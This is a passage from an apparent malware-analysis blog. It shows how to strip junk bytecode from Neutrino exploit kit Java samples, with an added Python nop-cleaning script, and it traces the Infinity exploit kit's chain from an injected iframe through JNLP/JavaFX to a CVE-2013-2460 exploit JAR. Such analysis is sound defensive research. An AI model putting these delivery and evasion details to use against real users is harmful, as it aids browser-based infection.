<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB12r49reWWSd_7o86GQTtIiE1dCQcMYaZc300WoHoNbyo0v6YFv8VjbgkcJXFtJ2fJcFkuayANghl1Q-nBTKoDrlQYCvaThUyCS8OaJ3796_FvKgEYy73G4XW03q85Es5f9KFZ4qxRQ8B/s1600/2014-01-Neutrino-code-sample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB12r49reWWSd_7o86GQTtIiE1dCQcMYaZc300WoHoNbyo0v6YFv8VjbgkcJXFtJ2fJcFkuayANghl1Q-nBTKoDrlQYCvaThUyCS8OaJ3796_FvKgEYy73G4XW03q85Es5f9KFZ4qxRQ8B/s1600/2014-01-Neutrino-code-sample.png" height="266" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Neutrino EK 2014-01 sample decompiled using JD-GUI</span></i></div>
<br />
While some of the source code was successfully decompiled, the methods are padded with tons of meaningless entries. The first thing that comes to mind is to simply remove all of this rubbish. Let's do just that and see what happens...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHU-d9d7uZA1vnq_BkTMyc9299QS518JGZz6Wo30E0U6RG727GACFeSS66jLVNLMVp-ZVQWX9Ymbrgvfpeya72Z6y8LSl-HRUO2PR0WeErIBdLqoSzeZ3OIv23GlayTyReI7jGiQvExHlf/s1600/2014-01-Neutrino-simple-deobfuscation.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHU-d9d7uZA1vnq_BkTMyc9299QS518JGZz6Wo30E0U6RG727GACFeSS66jLVNLMVp-ZVQWX9Ymbrgvfpeya72Z6y8LSl-HRUO2PR0WeErIBdLqoSzeZ3OIv23GlayTyReI7jGiQvExHlf/s1600/2014-01-Neutrino-simple-deobfuscation.png" height="320" width="222" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Neutrino EK decompiled code after rubbish clean up</span></i></div>
<br />
Some parts of the output can help to understand what the code is doing, but it's not valid Java code. The same approach definitely wouldn't work for methods similar to the one below...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhALcqhS4zvItXe4F23A8gRWR4ruUKTOhEOtkP6rnyxpCpWC9Sz37p3wTnToEpdstd-UbnVKWnuIR-5ViEdf49EgxHudeVl43tPuxhIRPzysFHT8PCPgRNunb_Cjbjg_WIE6DHoTnDjsd5h/s1600/2014-01-Neutrino-obfuscated-method.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhALcqhS4zvItXe4F23A8gRWR4ruUKTOhEOtkP6rnyxpCpWC9Sz37p3wTnToEpdstd-UbnVKWnuIR-5ViEdf49EgxHudeVl43tPuxhIRPzysFHT8PCPgRNunb_Cjbjg_WIE6DHoTnDjsd5h/s1600/2014-01-Neutrino-obfuscated-method.png" height="240" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Neutrino EK decompiled obfuscated Java method</span></i></div>
<br />
If we remove all the rubbish from this method we end up with no code left, yet this method actually performs the following...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8gJH7__0x0FtYEPIIFb1U9G_7sF4Kg293a8j4uwoSR8sPEkEnDz7TyVh5SmFhrxorLDcwDUaqu-4CHSnN9AZ5ELdckzMcaq06p93UDfN_MSpP9xcUoyh6jR_0cGvdR_O0RZ93dfgqyyRk/s1600/2014-01-Neutrino-deobfuscated-method.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8gJH7__0x0FtYEPIIFb1U9G_7sF4Kg293a8j4uwoSR8sPEkEnDz7TyVh5SmFhrxorLDcwDUaqu-4CHSnN9AZ5ELdckzMcaq06p93UDfN_MSpP9xcUoyh6jR_0cGvdR_O0RZ93dfgqyyRk/s1600/2014-01-Neutrino-deobfuscated-method.png" height="65" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Neutrino EK decompiled deobfuscated Java method</span></i></div>
<br />
So, how do we jump from '<span style="color: #3d85c6;">no sense</span>' to '<span style="color: #3d85c6;">full picture</span>'? The answer is in the bytecode.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqOwhtGP2Io8aVh1eEblGTfZGj7FwIHor0Wmd5QyAIv97b1pp_ldmS_SN3rI8sKby3YmicS4BgRtDF0JneqQU5QVNf-xZrQ8OdnVbdHRBmj1fFOjOxDvVvGhWGiHex2jJ0CPDUOqGHz9jm/s1600/2014-01-Neutrino-bytecode.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqOwhtGP2Io8aVh1eEblGTfZGj7FwIHor0Wmd5QyAIv97b1pp_ldmS_SN3rI8sKby3YmicS4BgRtDF0JneqQU5QVNf-xZrQ8OdnVbdHRBmj1fFOjOxDvVvGhWGiHex2jJ0CPDUOqGHz9jm/s1600/2014-01-Neutrino-bytecode.png" height="320" width="223" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">txjLPjLxt</span>' method in bytecode view</span></i></div>
<br />
What we're looking for are '<span style="color: #3d85c6;">push</span>' and '<span style="color: #3d85c6;">pop</span>' instructions and more importantly what happens in between. As you read through the bytecode, you might notice patterns start to emerge involving these two operations. Patterns similar to these...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCVTJR0hiQ7gtr8hbq3m0Eb0uAANOSXZm_erlvkIxibnXoAlrVhpTRSlogclqLaRWmFYyN4XAsgFiuaKy1SsDWdGY146CMCQHEaA5uPaZE3rvlYNLdBHk8-XY8ETvvwHr9tMo5WRirA1-W/s1600/2014-01-Neutrino-patterns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCVTJR0hiQ7gtr8hbq3m0Eb0uAANOSXZm_erlvkIxibnXoAlrVhpTRSlogclqLaRWmFYyN4XAsgFiuaKy1SsDWdGY146CMCQHEaA5uPaZE3rvlYNLdBHk8-XY8ETvvwHr9tMo5WRirA1-W/s1600/2014-01-Neutrino-patterns.png" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">examples of '<span style="color: #3d85c6;">push</span>' & '<span style="color: #3d85c6;">pop</span>' bytecode patterns</span></i></div>
<br />
In terms of program execution, these instructions have no effect on program state; they just keep the CPU busy. Pattern 1, for example, pushes two values onto the operand stack, swaps them and pops both off again. So, what happens if we relieve the CPU of the burden of running these instructions by removing them from the bytecode? Below is what's left of the '<span style="color: #3d85c6;">real</span>' instructions...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIddDzHYD36uvaZCZmNeTCKxAysQGEGM4yxM16DYNBFypx6PFSss95NbymWaxf40qP-zAzboam5XdmMebp6LPZ0apQm0tett00WgMJc8Qy6qQAYi3tjaS2oWchRzqEPEqu2CeRp-2KKfmW/s1600/2014-01-Neutrino-bytecode-cleaned.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIddDzHYD36uvaZCZmNeTCKxAysQGEGM4yxM16DYNBFypx6PFSss95NbymWaxf40qP-zAzboam5XdmMebp6LPZ0apQm0tett00WgMJc8Qy6qQAYi3tjaS2oWchRzqEPEqu2CeRp-2KKfmW/s1600/2014-01-Neutrino-bytecode-cleaned.png" height="261" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">bytecode after '<span style="color: #3d85c6;">push</span>' and '<span style="color: #3d85c6;">pop</span>' patterns are removed</span></i></div>
<br />
Let's now come back to the '<span style="color: #3d85c6;">init</span>' method we started with, perform the same bytecode clean-up and compare the result with the previous deobfuscation attempt, where we simply removed the rubbish entries from the decompiled code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ1vLUDZuccBPzTpTwuZOU7AVbgWyiiWyP9fJGVgP0fNeZ_HR1ZypI_MKfdDOszB-JVs1bPVSgknF3JiKWgSQY8bvC79CGrbXKB18_34NCJJgFj8cdsi7LBhzcGVUi_poyBPKsMoFcRSHa/s1600/2014-01-Neutrino-bytecode-deobfuscation-comparison.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ1vLUDZuccBPzTpTwuZOU7AVbgWyiiWyP9fJGVgP0fNeZ_HR1ZypI_MKfdDOszB-JVs1bPVSgknF3JiKWgSQY8bvC79CGrbXKB18_34NCJJgFj8cdsi7LBhzcGVUi_poyBPKsMoFcRSHa/s1600/2014-01-Neutrino-bytecode-deobfuscation-comparison.png" height="143" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i><span style="font-size: x-small;">Neutrino EK deobfuscation results comparison</span></i></div>
<br />
While in a few places the results match, the majority of the decompiled source code is different. After the bytecode clean-up we can clearly see what happens step by step.<br />
<br />
<b><span style="color: #3d85c6;">Short breakdown</span></b><br />
<br />
There are a few ways this bytecode clean-up can be performed. The steps for the simplest one are below:<br />
<br />
<ul>
<li>take a note of the exceptions (if any exist in the method you're about to edit): the '<span style="color: #3d85c6;">start</span>', '<span style="color: #3d85c6;">end</span>' and '<span style="color: #3d85c6;">handler</span>' addresses and the instructions they point at (my personal preference is to use dirtyJOE for viewing/editing exceptions).</li>
<li>replace the '<span style="color: #3d85c6;">push</span>' &amp; '<span style="color: #3d85c6;">pop</span>' patterns with '<span style="color: #3d85c6;">nop</span>' instructions (Java Bytecode Editor lets you do this more efficiently through its text-editor-style interface). Because a '<span style="color: #3d85c6;">nop</span>' takes exactly one byte, replacing every byte of the pattern keeps the method length and all addresses unchanged.</li>
<li>(optional) edit the exception table entries if the addressing has been skewed for some reason</li>
<li>save the changes and check the decompilation results</li>
</ul>
<div>
To make it more challenging you could take it a little bit further and remove the '<span style="color: #3d85c6;">nop</span>' instructions completely. Care must be taken here: every '<span style="color: #3d85c6;">conditional jump</span>', '<span style="color: #3d85c6;">goto</span>', '<span style="color: #3d85c6;">tableswitch</span>' or '<span style="color: #3d85c6;">lookupswitch</span>' instruction would have to be edited (in addition to any existing exception table entries) to reflect the new addressing, and for class files of version 51 (Java 7) or later the '<span style="color: #3d85c6;">StackMapTable</span>' frames carry offsets too, so the verifier rejects the method until those are rewritten as well.</div>
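<div>
As an added example (not code from the post, nor from Java Bytecode Editor or dirtyJOE), the following Python script performs the 'simplest' variant of the clean-up on a raw method body: it finds runs of push/swap/pop instructions that push values only to discard them again and overwrites them with nops, byte for byte, so that branch offsets and exception table ranges stay valid without any editing. Exception handler addresses are not part of the raw bytes, so they are passed in separately. The opcode lengths come from the JVM specification; tableswitch, lookupswitch and wide are deliberately not modelled. The two method bodies at the bottom are constructed, not taken from the Neutrino sample.</div>

```python
"""
Added example, not code from the post or from the tools it mentions: a
pattern cleaner that replaces stack-neutral push/swap/pop junk in a JVM
method body with nop (0x00).  Every replaced instruction keeps its byte
length, so branch offsets and exception-table ranges stay valid, which is
why the 'simplest' clean-up variant needs no address fix-ups.
The byte strings at the bottom are constructed, not from the Neutrino sample.
"""
import struct

# Instruction lengths for the opcodes this example models (JVM spec, ch. 6).
# tableswitch (0xaa), lookupswitch (0xab) and wide (0xc4) are variable length
# and deliberately left out: decode() raises on them rather than guessing.
_LEN = {}
for op in (list(range(0x00, 0x10)) + list(range(0x1a, 0x36)) + list(range(0x3b, 0x84))
           + list(range(0x85, 0x99)) + list(range(0xac, 0xb2)) + [0xbe, 0xbf, 0xc2, 0xc3]):
    _LEN[op] = 1
for op in [0x10, 0x12, 0x15, 0x16, 0x17, 0x18, 0x19, 0x36, 0x37, 0x38, 0x39, 0x3a, 0xa9, 0xbc]:
    _LEN[op] = 2
for op in ([0x11, 0x13, 0x14, 0x84] + list(range(0x99, 0xa9)) + list(range(0xb2, 0xb9))
           + [0xbb, 0xbd, 0xc0, 0xc1, 0xc6, 0xc7]):
    _LEN[op] = 3
_LEN[0xc5] = 4                                   # multianewarray
for op in [0xb9, 0xba, 0xc8, 0xc9]:              # invokeinterface, invokedynamic, goto_w, jsr_w
    _LEN[op] = 5

_BRANCH16 = set(range(0x99, 0xa9)) | {0xc6, 0xc7}   # ifeq..jsr, ifnull, ifnonnull
_BRANCH32 = {0xc8, 0xc9}                             # goto_w, jsr_w

# Side-effect-free stack ops: opcode -> (values it needs, net stack change).
# Only category-1 pushes are listed, so long/double constants never qualify.
_STACK = {0x57: (1, -1), 0x58: (2, -2), 0x59: (1, 1), 0x5f: (2, 0)}   # pop pop2 dup swap
for op in [0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x0b, 0x0c, 0x0d, 0x10, 0x11, 0x12, 0x13]:
    _STACK[op] = (0, 1)   # aconst_null, iconst_m1..5, fconst_0..2, bipush, sipush, ldc, ldc_w


def decode(code):
    """Linear sweep: [(pc, opcode, length)] for a method body."""
    insns, pc = [], 0
    while pc < len(code):
        op = code[pc]
        if op not in _LEN:
            raise ValueError("unsupported opcode 0x%02x at pc %d" % (op, pc))
        insns.append((pc, op, _LEN[op]))
        pc += _LEN[op]
    return insns


def branch_targets(code, insns):
    """Every pc some branch jumps to; offsets are relative to the branch's own pc."""
    targets = set()
    for pc, op, _ in insns:
        if op in _BRANCH16:
            targets.add(pc + struct.unpack_from(">h", code, pc + 1)[0])
        elif op in _BRANCH32:
            targets.add(pc + struct.unpack_from(">i", code, pc + 1)[0])
    return targets


def junk_run(insns, start, targets):
    """Shortest run from insns[start] that only pushes values and then consumes
    exactly those values (net 0, never reaching below its own pushes).  A run is
    rejected if a branch or handler lands inside it, because the two paths would
    then disagree on the stack depth once the run is nop'ed.  Returns the
    exclusive end index, or None."""
    depth = 0
    for i in range(start, len(insns)):
        pc, op, _ = insns[i]
        if op not in _STACK or (i > start and pc in targets):
            return None
        need, delta = _STACK[op]
        if depth < need:
            return None
        depth += delta
        if depth == 0:
            return i + 1
    return None


def clean(code, extra_targets=()):
    """Nop out junk runs.  extra_targets: exception-handler pcs from the method's
    exception table, which the raw bytes do not contain.  Returns (new_code,
    instructions_removed); len(new_code) == len(code) always holds."""
    out, insns = bytearray(code), decode(code)
    targets = branch_targets(code, insns) | set(extra_targets)
    i, removed = 0, 0
    while i < len(insns):
        end = junk_run(insns, i, targets)
        if end is None:
            i += 1
            continue
        for pc, _, length in insns[i:end]:
            out[pc:pc + length] = b"\x00" * length
        removed += end - i
        i = end
    return bytes(out), removed


# Constructed body: two junk runs wrapped around 'iload_0; iconst_1; iadd; ireturn'.
SAMPLE = bytes([
    0x10, 0x2a,        # bipush 42   } push, push, swap, pop, pop: pattern 1 from the post
    0x10, 0x07,        # bipush 7    }
    0x5f, 0x57, 0x57,  # swap, pop, pop
    0x1a,              # iload_0
    0x03, 0x57,        # iconst_0, pop: a second, shorter junk run
    0x04, 0x60, 0xac,  # iconst_1, iadd, ireturn
])

# Constructed body where 'iconst_1; pop' at pc 8-9 must survive: a goto lands on the pop.
BRANCHED = bytes([
    0x1a,              # 0: iload_0
    0x99, 0x00, 0x07,  # 1: ifeq -> 8
    0x05,              # 4: iconst_2
    0xa7, 0x00, 0x04,  # 5: goto -> 9 (arrives with one value already on the stack)
    0x04,              # 8: iconst_1
    0x57,              # 9: pop
    0x06,              # 10: iconst_3
    0xac,              # 11: ireturn
])

if __name__ == "__main__":
    cleaned, n = clean(SAMPLE)
    print(n, "instructions nop'ed:", cleaned.hex())
```

<div>
The second constructed body shows why branch targets matter: '<span style="color: #3d85c6;">iconst_1; pop</span>' looks like junk, but a '<span style="color: #3d85c6;">goto</span>' lands on the '<span style="color: #3d85c6;">pop</span>' with a value already on the stack, so nopping the pair would leave the two paths disagreeing about the stack depth and the verifier would reject the method. Feed the cleaned bytes back to javap or your decompiler to compare, as the screenshots above do.</div>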
<div>
<br /></div>
<div>
<u>NOTE:</u> Java Bytecode Editor performs a bytecode integrity check before saving edited methods. It will NOT let you save methods that either perform the sandbox escape (the exploit) or run instructions that rely on the post-exploit state. dirtyJOE will do this dirty job for you, but at the cost of the convenient code editor interface.</div>
<div>
<br /></div>
<div>
<br /></div>
Infinity EK: "No...unless round is funny." (published 2013-11-24, updated 2014-01-28)<br />
<br />
NOTE: The information is based on a sample captured on 2013-11-22
<br />
<br />
Thanks to <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a> for sharing '<span style="color: #3d85c6;">intel</span>' on this sample. The analysis was done using data gathered during a Fiddler '<span style="color: #3d85c6;">live</span>' capture.<br />
<br />
<i><u>Update 2014-01-27: </u></i><br />
<br />
This exploit kit got an official name - Infinity.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr_9mOsGsqCWXp2DvNeAL13lLipM57ymyr2YeLSLt9JHiRUHg28qyY95TyOpGkqygzYjyRMWykwQLyczW67wwVdoVC-pmu0yetz3AtXIKZt2vHSAMCRU1ZOKXyNQba8DmTtuK_WZa5BDiR/s1600/infinity.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr_9mOsGsqCWXp2DvNeAL13lLipM57ymyr2YeLSLt9JHiRUHg28qyY95TyOpGkqygzYjyRMWykwQLyczW67wwVdoVC-pmu0yetz3AtXIKZt2vHSAMCRU1ZOKXyNQba8DmTtuK_WZa5BDiR/s1600/infinity.png" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Infinity Exploit kit logo</i></span></div>
<br />
<br />
<i><u>Update 2013-11-25: </u></i><br />
<br />
<a href="https://twitter.com/PhysicalDrive0" rel="nofollow" target="_blank">@PhysicalDrive0</a> gave this EK a fancy name in <a href="http://vrt-blog.snort.org/2013/11/im-calling-this-goon-exploit-kit-for-now.html" rel="nofollow" target="_blank">this</a> blog post.<br />
<br />
<b><span style="color: #3d85c6;">"Smokey, this is not 'Nam. This is bowling. There are rules."</span></b><br />
<br />
The compromise attempt starts with a visit to a website into which a malicious '<span style="color: #3d85c6;"><iframe></span>' has been injected.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpVgUABEecZvDtS8r5rfACsfCeTcMOF9xwJhzN99TpO2a82KtDp3dRI750AWmKEM7yFIxrZLKxqYLcF_OG6rEYESWrdbTiLNWn1ctT68SLbOk5qDa233IKAv9SBMlJYgUPZpXBZgu-tV4r/s1600/Unkown_2013-11-22_iframe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpVgUABEecZvDtS8r5rfACsfCeTcMOF9xwJhzN99TpO2a82KtDp3dRI750AWmKEM7yFIxrZLKxqYLcF_OG6rEYESWrdbTiLNWn1ctT68SLbOk5qDa233IKAv9SBMlJYgUPZpXBZgu-tV4r/s1600/Unkown_2013-11-22_iframe.png" height="7" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;"><iframe> injected into one of the pages on compromised website</span></i></div>
<br />
As a side note, the website in this particular sample had been compromised twice: the same page that redirects the browser to the then-unknown EK also has a '<span style="color: #3d85c6;">CookieBomb</span>' script injected into it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS2XqQOYExdYaj2J-Az88nVaTzL2DprIWhX1IR3FS8T_Lj2xuZHtt0FEdytJoe2txOr8E1yrZNDKfrjrAq-fgzSKYJXYgmcwxs_EaqN9byMx4NirqN3TvXlecQfG-Fvq_VMAORynuxx6a3/s1600/Unkown_2013-11-22_CookieBomb_script.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS2XqQOYExdYaj2J-Az88nVaTzL2DprIWhX1IR3FS8T_Lj2xuZHtt0FEdytJoe2txOr8E1yrZNDKfrjrAq-fgzSKYJXYgmcwxs_EaqN9byMx4NirqN3TvXlecQfG-Fvq_VMAORynuxx6a3/s1600/Unkown_2013-11-22_CookieBomb_script.png" height="166" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of '<span style="color: #3d85c6;">CookieBomb</span>' script</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTJkosb2kBq0S5kHw7TNJkYPMVVW73Vf-U1uA1j_eK7yogLPXHjSbvag1eRMuTPZqtG8eAxn7f5aCwg20iKWEF0XX9hpBE55jz-3WuFkpZhbWwTDpKnOi3fn0jBsvmXrA0hfC8XNyX2FZf/s1600/Unkown_2013-11-22_CookieBomb_script_deobf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTJkosb2kBq0S5kHw7TNJkYPMVVW73Vf-U1uA1j_eK7yogLPXHjSbvag1eRMuTPZqtG8eAxn7f5aCwg20iKWEF0XX9hpBE55jz-3WuFkpZhbWwTDpKnOi3fn0jBsvmXrA0hfC8XNyX2FZf/s1600/Unkown_2013-11-22_CookieBomb_script_deobf.png" height="250" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of deobfuscated '<span style="color: #3d85c6;">CookieBomb</span>' script</span></i></div>
<br />
The URL the '<span style="color: #3d85c6;">CookieBomb</span>' script leads to was dead at the time the '<span style="color: #3d85c6;">live</span>' capture took place. More on the '<span style="color: #3d85c6;">CookieBomb</span>' threat can be found on the <a href="http://malwaremustdie.blogspot.com/2013/11/a-step-by-step-decoding-guide-for.html" rel="nofollow" target="_blank">MMD</a> website.<br />
<br />
Back to the Unknown EK: the following URL pattern was observed - <a href="http://pastebin.com/Q3DUG4Jp" rel="nofollow" target="_blank">pastebin.com</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghik4_A7RvowRgbM5gjj2qe9jUDnEa_n1FqJxvzq0KySpihrAF8XflkWdYxg6LrZEVgUgUHGwvpYZ6_s1vSkffrGwosNpgoheQgcDpXKIxxcaBwKCV9Sbtu5zAE17_5JGxWEpIhbHeXoyi/s1600/Unkown_2013-11-22_URL_pattern.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghik4_A7RvowRgbM5gjj2qe9jUDnEa_n1FqJxvzq0KySpihrAF8XflkWdYxg6LrZEVgUgUHGwvpYZ6_s1vSkffrGwosNpgoheQgcDpXKIxxcaBwKCV9Sbtu5zAE17_5JGxWEpIhbHeXoyi/s1600/Unkown_2013-11-22_URL_pattern.png" height="140" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">Unknown EK</span>' URL pattern</span></i></div>
<br />
Seeing a '<span style="color: #3d85c6;">cnt.php</span>' redirect script most likely indicates that the website was compromised through <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862" rel="nofollow" target="_blank">CVE-2013-1862</a>. Hendrick Adrian (MMD) covered this subject in great detail in one of his <a href="http://malwaremustdie.blogspot.com/2013/06/a-story-of-malware-url-cntphp.html" rel="nofollow" target="_blank">blog</a> posts.<br />
<br />
The EK landing page is as simple as it can be.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj51pm2Hnfff957C1Jqs6XNcwdXOUHorisc0fE3hujfpsC8XmeKNv6Gdc0jLbYS3IW8iDprZBfl_sHGGz88QJj7Akkfee1c_N7MPkP-KGKUO_RPQYUzCym7fuwWox3LKDgbxZ1xj1XAnRBw/s1600/Unkown_2013-11-22_initial_landing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj51pm2Hnfff957C1Jqs6XNcwdXOUHorisc0fE3hujfpsC8XmeKNv6Gdc0jLbYS3IW8iDprZBfl_sHGGz88QJj7Akkfee1c_N7MPkP-KGKUO_RPQYUzCym7fuwWox3LKDgbxZ1xj1XAnRBw/s1600/Unkown_2013-11-22_initial_landing.png" height="72" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Unknown EK landing page - request for JNLP</span></i></div>
<br />
The JNLP file launches a JavaFX application.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtfiFeOLACC3AESXIF1QZyql4T7HKE3jqW1Kb_wcvCikR6-x6yL5VFpHQf7KeBLzLMymHWZA6nB-F2pzOrbd_5_G1_QamKtz_i2oK3wj0o2k4gQ9fUVOmZnKRCASIldSG-b3EA4kLn4NFR/s1600/Unkown_2013-11-22_JNLP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtfiFeOLACC3AESXIF1QZyql4T7HKE3jqW1Kb_wcvCikR6-x6yL5VFpHQf7KeBLzLMymHWZA6nB-F2pzOrbd_5_G1_QamKtz_i2oK3wj0o2k4gQ9fUVOmZnKRCASIldSG-b3EA4kLn4NFR/s1600/Unkown_2013-11-22_JNLP.png" height="94" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Unknown EK JNLP file</span></i></div>
<br />
Note the number of HTTP GET requests after the JavaFX application JAR is downloaded. They are the result of the '<span style="color: #3d85c6;">Class-Path</span>' header in the '<span style="color: #3d85c6;">MANIFEST.MF</span>' file referencing those JARs: the JVM fetches every entry listed there, resolved relative to the main JAR's URL.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGnRo4S2E-I7lhiTWooWNA-KqNiMADpqKqkNRNP3-nHToesQhI5llzEEHmXXOqfpDOTMmVxoLe1hxA7QVGGhUFk4go4YZEr46ZQUpmtRYPyICN1uSJlNwNPIuPV3my8gSFYtS850_mJr-q/s1600/Unkown_2013-11-22_manifest.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGnRo4S2E-I7lhiTWooWNA-KqNiMADpqKqkNRNP3-nHToesQhI5llzEEHmXXOqfpDOTMmVxoLe1hxA7QVGGhUFk4go4YZEr46ZQUpmtRYPyICN1uSJlNwNPIuPV3my8gSFYtS850_mJr-q/s1600/Unkown_2013-11-22_manifest.png" height="60" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Unknown EK MANIFEST.MF file content</span></i></div>
<br />
Also note that there is no HTTP GET request for the Initial Payload in the Fiddler log. This is due to the way it is requested: during JavaFX application execution, control is passed to the '<span style="color: #3d85c6;">javaw.exe</span>' tool together with the class file that requests and executes the Initial Payload. A plain '<span style="color: #3d85c6;">javaw.exe</span>' process does not pick up the browser's proxy settings the way the plugin or Web Start runtime does, so it is not '<span style="color: #3d85c6;">proxy-aware</span>' and sends the request directly to the malicious website, bypassing Fiddler. In practice this means that on a network behind a web proxy with no direct access to the Internet the payload download fails and the infection chain stops there, even though the exploit itself has already run.<br />
<br />
<b><span style="color: #3d85c6;">"Back off, man. I'm a scientist!"</span></b><br />
<br />
There is almost no obfuscation applied to the code - some of the string variable values are split and then concatenated.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSnuG3cpjFYtrimaWyHMvDfftqlxT8UwzdGt8q3LTA4UF1Eg2dFTPN4om4iSxY3qWzBtizNXTTCJMeOlWXOkkOQEv30U81j96isgzsO8d99I7aN5CdJlqUndf0Qehs7GYdEZuYcKGJhbLK/s1600/Unkown_2013-11-22_URL_obfus_example.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSnuG3cpjFYtrimaWyHMvDfftqlxT8UwzdGt8q3LTA4UF1Eg2dFTPN4om4iSxY3qWzBtizNXTTCJMeOlWXOkkOQEv30U81j96isgzsO8d99I7aN5CdJlqUndf0Qehs7GYdEZuYcKGJhbLK/s1600/Unkown_2013-11-22_URL_obfus_example.png" height="13" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">string value obfuscation example</span></i><br />
<div>
<i><span style="font-size: x-small;"><br /></span></i></div>
</div>
The JAR file carries exploit code for <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2460" rel="nofollow" target="_blank">CVE-2013-2460</a>.<br />
<br />
